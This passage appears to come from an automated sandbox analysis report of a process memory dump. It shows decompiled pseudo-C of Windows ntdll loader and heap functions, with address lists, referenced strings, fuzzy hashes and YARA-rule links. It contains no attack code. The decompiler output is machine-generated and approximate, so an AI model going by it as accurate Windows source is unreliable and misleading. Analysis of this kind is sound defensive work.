						E030D1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E03037D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E03037D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E030D1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0306D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x0303a229
0x0303a231
0x0303a23f
0x0303a242
0x0303a244
0x0303a24c
0x0303a255
0x0303a25a
0x0303a25f
0x03081c76
0x03081c78
0x03081c7e
0x03081c7f
0x03081c81
0x03081c82
0x03081c84
0x03081c89
0x03081c8b
0x03081c9e
0x03081c9e
0x03081cab
0x03081cb2
0x00000000
0x03081cb2
0x03081c8d
0x03081c92
0x00000000
0x00000000
0x03081c94
0x03081c98
0x00000000
0x00000000
0x00000000
0x03081c98
0x0303a265
0x0303a265
0x0303a266
0x0303a26f
0x0303a270
0x0303a276
0x0303a277
0x0303a279
0x0303a27e
0x0303a282
0x03081db5
0x03081dbb
0x03081dc1
0x03081dc5
0x03081de4
0x03081de9
0x03081dc7
0x03081ddc
0x03081de1
0x03081def
0x03081df3
0x03081df7
0x03081dfe
0x03081e06
0x0303a302
0x0303a308
0x0303a308
0x0303a288
0x0303a28d
0x0303a294
0x03081cc1
0x0303a29a
0x0303a29a
0x0303a29a
0x0303a29f
0x03081ccb
0x03081cd1
0x03081cd8
0x03081cea
0x03081cea
0x03081cd8
0x0303a2a9
0x0303a2af
0x0303a2bc
0x03081cfd
0x0303a2c2
0x0303a2c2
0x0303a2c2
0x0303a2c7
0x03081d07
0x03081d0d
0x03081d14
0x03081d1f
0x03081d21
0x03081d2c
0x03081d2c
0x03081d2c
0x03081d47
0x03081d47
0x03081d14
0x0303a2cd
0x0303a2d2
0x0303a2d9
0x03081d5a
0x0303a2df
0x0303a2df
0x0303a2df
0x0303a2e4
0x03081d69
0x03081d6b
0x03081d76
0x03081d76
0x03081d76
0x03081d91
0x03081d91
0x0303a2ea
0x0303a2f0
0x0303a2f5
0x03081da8
0x03081dad
0x03081dad
0x0303a2fd
0x0303a300
0x00000000

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03081DF9
`, xrefs: 03081C8D
HEAP[%wZ]: , xrefs: 03081DD7
HEAP: , xrefs: 03081DE4

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 77afcc3739c3fe9378d47b4aa8ad9589cf25e46c6560b10cf637e605fa9fdc97
Instruction ID: a621511b355cb840fb18a5aeac60bf7e2ff1306db7be5f3b1a6db259476278eb
Opcode Fuzzy Hash: 77afcc3739c3fe9378d47b4aa8ad9589cf25e46c6560b10cf637e605fa9fdc97
Instruction Fuzzy Hash: 7851043130A7809FD325EB68C845F6BB7ECFF85B50F090864F9958B291DB64D901CB61

Uniqueness

Uniqueness Score: -1.00%

Function 03048E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E03048E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x310d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3108464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3105780 & 0x00000003) != 0) {
							E03095510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3105780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0305B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3107984; // 0x1412b90
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3108464; // 0x74b10110
					 *0x310b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03049B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3105780 & 0x00000005) != 0) {
						_push(_t49);
						E03095510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x03048e0f
0x03048e16
0x03048e19
0x03048e1b
0x03048e21
0x03048e7f
0x03048e85
0x03089354
0x0308936c
0x03089371
0x0308937b
0x03089381
0x03089381
0x0308937b
0x03048e9d
0x03048e9d
0x03048e29
0x03048e2c
0x03048e38
0x03048e3e
0x03048e43
0x03048eb5
0x03048eb9
0x030892aa
0x030892af
0x030892e8
0x030892e8
0x030892af
0x03048eb9
0x03048e45
0x03048e53
0x03048e5b
0x03048e5f
0x03048e78
0x03048e78
0x03048e7d
0x03048ec3
0x03048ecd
0x03048ed2
0x03048ed2
0x03048ec5
0x03048ec5
0x00000000
0x03048e7d
0x03048e67
0x03048ea4
0x0308931a
0x00000000
0x00000000
0x03089320
0x03048ea4
0x03048e70
0x03089325
0x03089340
0x03089345
0x03089345
0x03048e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

LdrpFindDllActivationContext, xrefs: 03089331, 0308935D
Querying the active activation context failed with status 0x%08lx, xrefs: 03089357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0308932A
minkernel\ntdll\ldrsnap.c, xrefs: 0308933B, 03089367

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 7b27e89880be6c6590d046b3154832162a18b0ad497a913d547537cb882768bb
Instruction ID: 812b8708ad7fe7cb1319ff0e557a8925718bc4ceb8a84ca45e0f680c0b9cd8c8
Opcode Fuzzy Hash: 7b27e89880be6c6590d046b3154832162a18b0ad497a913d547537cb882768bb
Instruction Fuzzy Hash: 3D413CB1A023119FDBB5FB168848B79B3E9AB04648F0DCD79D90557150E7B29EC08693

Uniqueness

Uniqueness Score: -1.00%

Function 030D49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 030D4A61
HEAP[%wZ]: , xrefs: 030D4A3D, 030D4AB7
HEAP: , xrefs: 030D4A4A, 030D4A5D, 030D4A5F, 030D4AC4
This is located in the %s field of the heap header., xrefs: 030D4AD6

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 9076ec62cf5aa7ceeb4c109ecf8af16b157d0e57cbcd7334e14364ae855c07fa
Instruction ID: cb67f62997a66f3ecb04c6ee1be9266a12e81addaacb59bf03f6f0dd191d150d
Opcode Fuzzy Hash: 9076ec62cf5aa7ceeb4c109ecf8af16b157d0e57cbcd7334e14364ae855c07fa
Instruction Fuzzy Hash: 8F312835202304EFD3A0DB5EC88AFABB3E8EF44660F194465F516DF250DB70E980C668

Uniqueness

Uniqueness Score: -1.00%

Function 03028794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E03028794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0302934A() != 0) {
								_t159 = E0309A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3105780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03095510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3105780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0302849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03028999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03028999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3105c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3105c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03032280(_t92, 0x31086cc);
															_t94 = E030E9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E030461A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3105c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03028A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3105c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3105c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0305F380(_t136, 0x2ff1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03032280(_t108, 0x31086cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E030461A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E030E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0302FFB0(_t118, _t156, 0x31086cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03059A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x03028799
0x0302879d
0x030287a1
0x030287a3
0x030287a8
0x030287c3
0x030287c3
0x030287c8
0x030287d1
0x030287d4
0x030287d8
0x030287e5
0x030287ec
0x03079bfe
0x03079c00
0x03079c02
0x03079c08
0x03079c0d
0x03079c0f
0x03079c14
0x03079c2d
0x03079c32
0x03079c37
0x03079c3a
0x03079c3c
0x03079c42
0x03079c42
0x03079c3c
0x03079c02
0x030287da
0x030287df
0x030287e3
0x00000000
0x00000000
0x030287e3
0x030287f2
0x00000000
0x030287fb
0x030287fd
0x030287fe
0x0302880e
0x0302880f
0x03028810
0x03028814
0x0302881a
0x0302881c
0x0302881f
0x03028821
0x03028822
0x03028824
0x03028826
0x0302882c
0x0302882e
0x03079c48
0x03079c48
0x03028834
0x03028834
0x03028837
0x00000000
0x00000000
0x03028837
0x0302882e
0x0302883d
0x03028840
0x03028843
0x03028846
0x03028849
0x0302884c
0x0302884e
0x03028850
0x03028852
0x03028854
0x03028857
0x030288b4
0x030288b6
0x030288b6
0x03028859
0x03028859
0x03028859
0x03028861
0x03028866
0x0302886a
0x0302893d
0x03028941
0x00000000
0x03028947
0x03028947
0x0302894a
0x0302894c
0x00000000
0x03028952
0x03028955
0x0302895a
0x0302895d
0x0302895d
0x0302895f
0x03028961
0x03028961
0x03028968
0x00000000
0x00000000
0x0302896a
0x0302896b
0x0302896e
0x00000000
0x03028970
0x03028970
0x03028970
0x03028970
0x03028972
0x03028972
0x03028974
0x00000000
0x0302897a
0x0302897a
0x0302897d
0x00000000
0x03028983
0x03079c65
0x03079c6d
0x03079c72
0x03079c75
0x03079c75
0x03079c82
0x03079c86
0x03079c87
0x03079c88
0x03079c89
0x03079c8c
0x03079c90
0x03079c95
0x03079c97
0x03079ca0
0x03079ca3
0x03079ca9
0x03079ca9
0x00000000
0x03079ca9
0x03079ca3
0x00000000
0x03079c97
0x0302897d
0x00000000
0x03028974
0x03028988
0x03028992
0x03028996
0x00000000
0x03028996
0x0302894c
0x00000000
0x03028870
0x0302887b
0x0302887d
0x0302887f
0x03028881
0x03028884
0x03028884
0x03028886
0x03028889
0x0302888c
0x0302888e
0x03028891
0x03028891
0x03028898
0x00000000
0x00000000
0x0302889a
0x0302889b
0x0302889e
0x00000000
0x00000000
0x030288a0
0x030288a8
0x030288b0
0x030288b2
0x030288d3
0x030288d5
0x00000000
0x030288d7
0x030288db
0x030288dc
0x030288e0
0x030288e8
0x030288ee
0x030288f0
0x030288f3
0x030288fc
0x03028901
0x03028906
0x0302890c
0x0302890c
0x0302890f
0x03028916
0x03028917
0x03028918
0x03028919
0x0302891a
0x0302891f
0x03028921
0x03079c52
0x03079c55
0x03079c5b
0x03079cac
0x03079cc0
0x03079cc0
0x03079c55
0x03028927
0x03028927
0x0302892f
0x03028933
0x00000000
0x030288f5
0x030288f5
0x00000000
0x030288f7
0x030288f7
0x030288fa
0x00000000
0x00000000
0x00000000
0x00000000
0x030288fa
0x030288f5
0x030288f3
0x00000000
0x030288d5
0x00000000
0x030288b2
0x030288c9
0x00000000
0x030288c9
0x0302887f
0x0302886a
0x03028857
0x03028852
0x030288bf
0x030288bf
0x030287aa
0x030287ad
0x030287ae
0x030287b4
0x030287b5
0x030287b6
0x030287b8
0x030287bd
0x030287c1
0x030287f4
0x030287fa
0x00000000
0x00000000
0x00000000
0x030287c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 03079C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03079C18
minkernel\ntdll\ldrsnap.c, xrefs: 03079C28

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 18f3808e94e32622a3eb34ec9a8ff0deb0ad81e44bad303a24d7baa59db9d06e
Instruction ID: e54981544f28a8e71fdd7dd6d32ca54f0f2e361445d48a599f48b0c79536f72c
Opcode Fuzzy Hash: 18f3808e94e32622a3eb34ec9a8ff0deb0ad81e44bad303a24d7baa59db9d06e
Instruction Fuzzy Hash: D191F679A02229DFDF58DF59C4809BEBBF9FF85314B1880A9ED05AB250D770E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03027E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E03027E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0302CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0301C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3105780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03095510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3105780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03037D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03037D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03097016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03037D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03037D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03097016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0304A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0301B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x03027e4c
0x03027e50
0x03027e55
0x03027e58
0x03027e5d
0x03027e71
0x03027f33
0x03027e77
0x03027e77
0x03027e79
0x03027e79
0x03027e7e
0x03027f45
0x03079848
0x00000000
0x03079848
0x03027f4e
0x03027f53
0x03027f5a
0x00000000
0x00000000
0x0307985a
0x03079862
0x03079866
0x00000000
0x0307986c
0x00000000
0x0307986c
0x03027e84
0x03027e84
0x03027e8d
0x03079871
0x03027eb8
0x03027ec0
0x03027ec0
0x03027e9a
0x0307987e
0x00000000
0x00000000
0x03079884
0x0307988b
0x030798a7
0x030798ac
0x030798b1
0x030798b6
0x030798b8
0x030798b8
0x030798b9
0x00000000
0x030798b9
0x03027ea0
0x03027ea7
0x00000000
0x00000000
0x03027eac
0x03027eb1
0x03027ec6
0x03027ed0
0x030798cc
0x03027ed6
0x03027ed6
0x03027ed6
0x03027ede
0x03027ee3
0x030798e3
0x030798f0
0x03079902
0x030798f2
0x030798fb
0x030798fb
0x03079907
0x0307991d
0x0307991d
0x03079907
0x030798e3
0x03027ef0
0x03027f14
0x03027f14
0x03027f1e
0x03079946
0x03027f24
0x03027f24
0x03027f24
0x03027f2c
0x0307996a
0x03079975
0x03079975
0x0307997e
0x03079993
0x03079993
0x0307997e
0x00000000
0x03027ef2
0x03027efc
0x03027f0a
0x03027f0e
0x03079933
0x00000000
0x03079933
0x00000000
0x03027f0e
0x00000000
0x00000000
0x00000000
0x03027eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 030798A2
LdrpCompleteMapModule, xrefs: 03079898
Could not validate the crypto signature for DLL %wZ, xrefs: 03079891

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 15cc28af6a71cdb7112dc7f90ef1cdb1f59575573d65c1bdfdd6f5ad2e3a09ca
Instruction ID: 144f9c7157bac2985a7c5c8af2cbf7f77aa3e687e4f496279929fbd8ebbcfd2f
Opcode Fuzzy Hash: 15cc28af6a71cdb7112dc7f90ef1cdb1f59575573d65c1bdfdd6f5ad2e3a09ca
Instruction Fuzzy Hash: 58513631A06745DBEB61CB5CC844B6ABBE4FF49B14F080599E9619B3E2D730ED00C760

Uniqueness

Uniqueness Score: -1.00%

Function 0301E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0301E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0301F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E030595D0();
						}
						if(_t78 != 0) {
